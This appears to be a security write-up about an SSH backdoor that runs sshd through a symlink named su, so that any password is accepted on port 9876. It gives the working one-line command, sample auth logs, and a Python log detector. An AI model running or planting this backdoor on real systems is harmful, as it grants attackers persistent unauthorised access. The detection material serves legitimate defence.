A Shell Backdoor that allows random password to login

This backdoor has been tested on RHEL-5, 6, 7 and Debian 7, and it works on all of them. The command below starts an SSH listener on a chosen port and lets any valid user log in with an arbitrary password, because the daemon is invoked under the name su and so authenticates through the su PAM stack instead of the sshd one.

# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=9876

Typical authentication log on RHEL-5:

Jul 3 02:57:49 test su[17802]: Accepted password for irc from 127.0.0.1 port 51299 ssh2
Jul 3 02:57:49 test su[17802]: pam_unix(su:session): session opened for user irc by (uid=0)
Jul 3 02:57:49 test su[17802]: pam_mkhomedir(su:session): unknown option: mask=0022
Jul 3 02:57:50 test su[19237]: Received disconnect from 127.0.0.1: 11: disconnected by user
Jul 3 02:57:50 test su[17802]: pam_unix(su:session): session closed for user irc

Typical auth log on RHEL-7:

Jul 2 01:11:54 rhel7 su[41753]: Accepted password for root from ::1 port 45970 ssh2
Jul 2 01:11:54 rhel7 su[41753]: pam_unix(su:session): session opened for user root by (uid=0)
Jul 2 01:11:54 rhel7 su[41753]: error: ssh_selinux_setup_pty: security_compute_relabel: Invalid argument

This malicious behavior can be tracked through these log records: messages that only sshd emits ("Accepted password ... ssh2", "Received disconnect from ...", "error: ssh_selinux_setup_pty ...") appear under the process name su rather than sshd, together with a session opened by uid=0.
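As an added example (not part of the original post), the following Python detector applies that observation: it parses syslog-format lines and flags sshd-specific messages logged under any program name other than sshd. The sample input reuses the page's own log records plus two constructed benign lines; the marker patterns, the `SYSLOG_RE` layout and the function names are my own assumptions.

```python
import re

# Syslog line layout assumed here: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) '
    r'(?P<prog>[^\[\s:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$'
)

# Messages that only sshd produces. The program name in the log is whatever the
# attacker named the symlink, so we key on the message text, not on the name.
SSHD_ONLY_MARKERS = (
    re.compile(r'^Accepted \w+ for \S+ from \S+ port \d+ ssh2$'),
    re.compile(r'^Received disconnect from '),
    re.compile(r'^error: ssh_selinux_'),
)


def parse_syslog(line):
    """Split one syslog line into its fields, or return None if it does not match."""
    m = SYSLOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_sshd_impostors(lines, legit_progs=("sshd",)):
    """Return (host, prog, pid, msg) for sshd-only messages logged under another program name."""
    hits = []
    for line in lines:
        rec = parse_syslog(line)
        if rec is None or rec["prog"] in legit_progs:
            continue
        if any(p.search(rec["msg"]) for p in SSHD_ONLY_MARKERS):
            hits.append((rec["host"], rec["prog"], rec["pid"], rec["msg"]))
    return hits


# Constructed sample: the page's RHEL-5 and RHEL-7 records plus two benign lines.
SAMPLE_LOG = [
    "Jul 3 02:57:49 test su[17802]: Accepted password for irc from 127.0.0.1 port 51299 ssh2",
    "Jul 3 02:57:49 test su[17802]: pam_unix(su:session): session opened for user irc by (uid=0)",
    "Jul 3 02:57:49 test su[17802]: pam_mkhomedir(su:session): unknown option: mask=0022",
    "Jul 3 02:57:50 test su[19237]: Received disconnect from 127.0.0.1: 11: disconnected by user",
    "Jul 3 02:57:50 test su[17802]: pam_unix(su:session): session closed for user irc",
    "Jul 2 01:11:54 rhel7 su[41753]: Accepted password for root from ::1 port 45970 ssh2",
    "Jul 2 01:11:54 rhel7 su[41753]: error: ssh_selinux_setup_pty: security_compute_relabel: Invalid argument",
    "Jul 3 03:00:00 test sshd[20001]: Accepted password for alice from 10.0.0.5 port 50000 ssh2",
    "Jul 3 03:00:01 test su[20002]: pam_unix(su:session): session opened for user root by alice(uid=1000)",
]

if __name__ == "__main__":
    for hit in find_sshd_impostors(SAMPLE_LOG):
        print("suspicious sshd activity under program name %r (pid %s) on %s: %s" % (hit[1], hit[2], hit[0], hit[3]))
```

The same check works on any program name: the attacker picks the symlink name, but cannot change the strings sshd itself logs.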
